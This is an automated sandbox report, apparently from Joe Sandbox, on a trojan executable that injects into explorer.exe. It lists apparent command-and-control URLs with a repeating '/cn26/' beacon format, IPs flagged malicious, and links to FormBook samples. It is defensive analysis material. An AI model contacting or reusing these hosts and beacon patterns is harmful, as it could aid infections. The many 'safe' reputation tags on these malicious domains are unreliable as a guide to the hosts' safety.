                                                  http://www.shopusuniform.com/cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTbtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.yipicircle.life/cn26/?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTbtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.happyjumps.co/cn26/?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTbtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  www.tires-book-robust.bond/cn26/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.dehamobilya.com/cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTbtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tiensbangladesh.net/cn26/?V410V=CmFgnMATfu/lD1Rd1GHYmtbpicIpwpy90rRc4LoWjy4DICrpuFEBTKor21hYt8nWF2kM&Kr=YtxTbtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://word.office.comonexplorer.exe, 00000007.00000002.4446934807.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.scientificmetalscorp.coexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tempotrekstore.com/cn26/www.xztyvk.xyzexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.xztyvk.xyzexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.yipicircle.lifeexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.j0mui3.shopReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.e2olyiab.shopexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cgffwelcome.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dehamobilya.com/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sswpdx.com/cn26/www.scientificmetalscorp.coexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://powerpoint.office.comcemberexplorer.exe, 00000007.00000000.2012740355.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4450786934.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://tempuri.org/DataSet1.xsdhOe2JrpIAE.exefalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.foton.africa/cn26/www.e2olyiab.shopexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.e2olyiab.shop/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://excel.office.comexplorer.exe, 00000007.00000003.3099099836.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096597969.0000000009B7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4447710215.0000000009B81000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.tiensbangladesh.net/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.microexplorer.exe, 00000007.00000000.2010237532.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4446456942.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2009741979.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.tiensbangladesh.netexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.scientificmetalscorp.co/cn26/www.ajtsistemas.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sswpdx.com/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.theburnscleanteam.comReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.happyjumps.co/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.google.comexplorer.exe, 00000007.00000002.4453541198.0000000010E2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.4443371821.00000000046CF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.autoitscript.Aexplorer.exe, 00000007.00000000.2013207443.000000000C8DD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.autoitscript.Bexplorer.exe, 00000007.00000003.3098535056.000000000C8DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096521466.000000000C8DD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.shopusuniform.com/cn26/www.j0mui3.shopexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.shopusuniform.com/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.e2olyiab.shopReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.scientificmetalscorp.coReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.shopusuniform.comReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tires-book-robust.bond/cn26/www.foton.africaexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.theburnscleanteam.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.foton.africa/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dehamobilya.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.e2olyiab.shop/cn26/www.yipicircle.lifeexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.happyjumps.coexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ajtsistemas.com/cn26/explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.autoitscript.explorer.exe, 00000007.00000003.3777555916.000000000C8EB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tempotrekstore.comReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000007.00000003.3098637821.000000000C513000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4451078883.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2012740355.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ajtsistemas.comReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.foton.africaexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.scientificmetalscorp.co/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://wns.windows.com/)sexplorer.exe, 00000007.00000002.4446934807.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tires-book-robust.bondexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.happyjumps.coReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.j0mui3.shop/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tiensbangladesh.net/cn26/www.shopusuniform.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.theburnscleanteam.com/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tires-book-robust.bond/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.j0mui3.shopexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dehamobilya.comReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.happyjumps.co/cn26/www.tires-book-robust.bondexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tires-book-robust.bondReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dehamobilya.com/cn26/www.happyjumps.coexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.foton.africaReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.j0mui3.shop/cn26/www.cgffwelcome.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cgffwelcome.com/cn26/www.dehamobilya.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sswpdx.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.chiark.greenend.org.uk/~sgtatham/putty/0hOe2JrpIAE.exefalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://outlook.comexplorer.exe, 00000007.00000003.3777677954.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3098080000.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096597969.0000000009B7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4447809365.0000000009D42000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cgffwelcome.com/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tempotrekstore.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.yipicircle.life/cn26/www.tempotrekstore.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tiensbangladesh.netReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.yipicircle.lifeReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://android.notify.windows.com/iOSexplorer.exe, 00000007.00000000.2009042834.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.cgffwelcome.comReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.theburnscleanteam.com/cn26/www.tiensbangladesh.netexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://api.msn.com/explorer.exe, 00000007.00000002.4446934807.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.shopusuniform.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sswpdx.comReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.xztyvk.xyzReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.vexplorer.exe, 00000007.00000000.2007072938.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4441584000.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.yipicircle.life/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ajtsistemas.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.xztyvk.xyz/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.xztyvk.xyz/cn26/www.sswpdx.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tempotrekstore.com/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  14.128.41.165
                                                  		pa94nj5r.vakcloud.comSingapore
                                                  		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                  199.59.243.226
                                                  		www.shopusuniform.comUnited States
                                                  		395082BODIS-NJUStrue
                                                  34.149.87.45
                                                  		td-ccm-neg-87-45.wixdns.netUnited States
                                                  		2686ATGS-MMD-ASUStrue
                                                  162.244.93.3
                                                  		www.tiensbangladesh.netUnited States
                                                  		53667PONYNETUStrue
                                                  3.33.130.190
                                                  		yipicircle.lifeUnited States
                                                  		8987AMAZONEXPANSIONGBtrue

                                                  General Information

                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1466892
                                                  Start date and time:2024-07-03 14:49:03 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 11m 47s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:13
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Sample name:hOe2JrpIAE.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:f3b25ff7dc9cfcab029413dbaab77efdb5017d72ff5c0cc4d88769de1def78a6.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@14/1@12/5
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 98%
                                                  • Number of executed functions: 206
                                                  • Number of non-executed functions: 294
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: hOe2JrpIAE.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  08:49:48API Interceptor1x Sleep call for process: hOe2JrpIAE.exe modified
                                                  08:49:56API Interceptor9556642x Sleep call for process: explorer.exe modified
                                                  08:50:33API Interceptor8535039x Sleep call for process: netsh.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  199.59.243.226factura.exeGet hashmaliciousFormBookBrowse
                                                  • www.4cityclean.uno/qpcj/
                                                  RSW6103D401005.exeGet hashmaliciousFormBookBrowse
                                                  • www.42bomclub.com/zq0e/
                                                  82xul16VKj.exeGet hashmaliciousCryptOne, VidarBrowse
                                                  • survey-smiles.com/
                                                  rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                                                  • www.mommysdaycare.net/k4dg/
                                                  1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                  • www.42bomclub.com/zq0e/
                                                  AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                                  • www.window-replace5.top/dihh/
                                                  eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
